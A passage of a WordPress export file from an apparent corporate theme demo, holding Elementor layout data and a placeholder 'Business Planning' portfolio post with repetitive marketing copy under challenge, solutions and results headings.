ments":[{"id":"cd7e2bf","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"0436c90","elType":"widget","settings":{"title":"<span style=\"color:#55bb53\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"0a09298","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"cf49ef8","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#55BB53","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"6fd39b5","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"9e10407","elType":"widget","settings":{"title":"<span style=\"color:#55bb53\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"52b3cb4","elType":"widget","settings":{"editor":"<p>What\u2019s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"380f87e","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"04b1b4d","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"71c4a69","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"04ad02e","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"50352c4","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"8aa105b","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"e3e8f07","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"45f77e5","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"8843b45","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]},"bar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"77f8f37","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"c4cd2a7","elType":"widget","settings":{"title":"<span style=\"color:#55bb53\">03.<\/span> Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"fbb2c29","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"28b2262","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"0c9397b","elType":"widget","settings":{"editor":"<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.<\/p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #55bb53;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.<\/p>","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"163a7a6","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"02658e3","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-project-home-4.png","id":2064},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"3d40a65","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[800]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layout";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:4;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Business Planning</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/business-planning/</link>
		<pubDate>Fri, 11 Sep 2020 04:38:39 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=ot_portfolio&#038;p=802</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.</p>		
			<h6>Client:</h6>		
		<p>OceanThemes</p>		
			<h6>Website:</h6>		
		<p>oceanthemes.net</p>		
			<h6>Date:</h6>		
		<p>June 25, 2019</p>		
			<h6>Category:</h6>		
		<p>Marketing/Finance</p>		
										<img width="1174" height="620" src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-details.jpg 1174w, https://maxbizz.s3.amazonaws.com/images/project-details-1-300x158.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-details-1-1024x541.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project-details-1-768x406.jpg 768w" sizes="(max-width: 1174px) 100vw, 1174px" />											
			<h5>01. Сhallenge</h5>		
		<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
						</ul>
			<h5>02. Solutions</h5>		
		<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>03. Results</h5>		
		<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.</p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.</p>		
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-project-home-4.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-project-home-4.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-project-home-4-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
					<a target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>802</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 04:38:39]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 04:38:39]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[business-planning]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_portfolio]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="portfolio_cat" nicename="business"><![CDATA[business]]></category>
		<category domain="portfolio_cat" nicename="startup"><![CDATA[startup]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[803]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"397902fd","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"26a3c89f","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"5d3639ae","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"4764c788","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"c953f5b","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"6976af58","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"532be286","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"1f8d8f2","elType":"widget","settings":{"editor":"<p>OceanThemes<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"f6bdc05","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"456060bf","elType":"widget","settings":{"editor":"<p>oceanthemes.net<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"1b23ea4e","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"3795aac6","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"7c34ff65","elType":"widget","settings":{"editor":"<p>June 25, 2019<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"426b0206","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"44248ebd","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"3832640c","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"b6a26ad","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"481b7621","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"550b73a","elType":"section","settings":[],"elements":[{"id":"5631e5c","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"8e46971","elType":"widget","settings":{"title":"<span style=\"color:#55bb53\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"30a9b5d","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"d23b0cd","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#55BB53","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"93beaee","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"85fd778","elType":"widget","settings":{"title":"<span style=\"color:#55bb53\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"fd7ef5d","elType":"widget","settings":{"editor":"<p>What\u2019s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"4035ba7","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"37f1011","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"7c84161","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#55BB53"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"fdf19f6","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"e1807ec","elType":"widget","settings":{"bar_style":"circle","title":"business 